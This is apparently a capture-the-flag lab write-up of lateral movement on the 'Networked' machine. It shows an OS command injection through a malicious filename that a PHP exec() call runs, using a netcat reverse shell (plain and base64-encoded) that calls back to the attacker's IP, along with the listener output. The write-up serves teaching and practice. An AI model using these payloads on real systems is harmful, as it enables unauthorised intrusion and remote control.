InfoSec LAB

Networked_Lateral_Movement

Created: 2 min read

OS Command Injection

As enumerated during the Post Enumeration phase, I will be using the script to take advantage of the $value variable, which I have control over. I won’t be writing a file with malicious content, instead, the filename itself will be malicious this time as it will passthrough the $value variable, which then gets passed to the exec() function later.

The script does NOT run any form of sanitization of the $value variable, resulting $value being executed on the system.

I need to set the $value variable to discard the commands before and after

  • I can use ; to terminate the first command with an arbitrary value
  • I can also use # to command out the rest commands after $value
bash-4.2$ touch '; nc 10.10.14.11 8888 -e sh #'

This is the payload. It will be stored to the $value variable, which will be part of a OS command execution call through the PHP exec()

exec("nohup /bin/rm -f $path; nc 10.10.14.11 8888 -e sh #> /dev/null 2>&1 &"); It’s going to look like that on execution

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 48322

A moment later, a connection came through but immediately got cut off I tried again by providing the absolute path of /bin/bash, and was unable to make such file likely due to the system not being able to parse the forward slashes (/)

I will encode that

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ echo 'nc 10.10.14.11 8888 -e /bin/bash' | base64                                                
bmMgMTAuMTAuMTQuMTEgODg4OCAtZSAvYmluL2Jhc2gK

Base64 encoding

bash-4.2$ touch '; echo bmMgMTAuMTAuMTQuMTEgODg4OCAtZSAvYmluL2Jhc2gK | base64 -d | bash #'

I created the file again and it worked out

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 48352
whoami
guly
hostname
networked.htb
/usr/sbin/ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:99:2f brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:992f/64 scope global mngtmpaddr dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb9:992f/64 scope link 
       valid_lft forever preferred_lft forever

Lateral Movement to the guly user

Interactive Graph View

Backlinks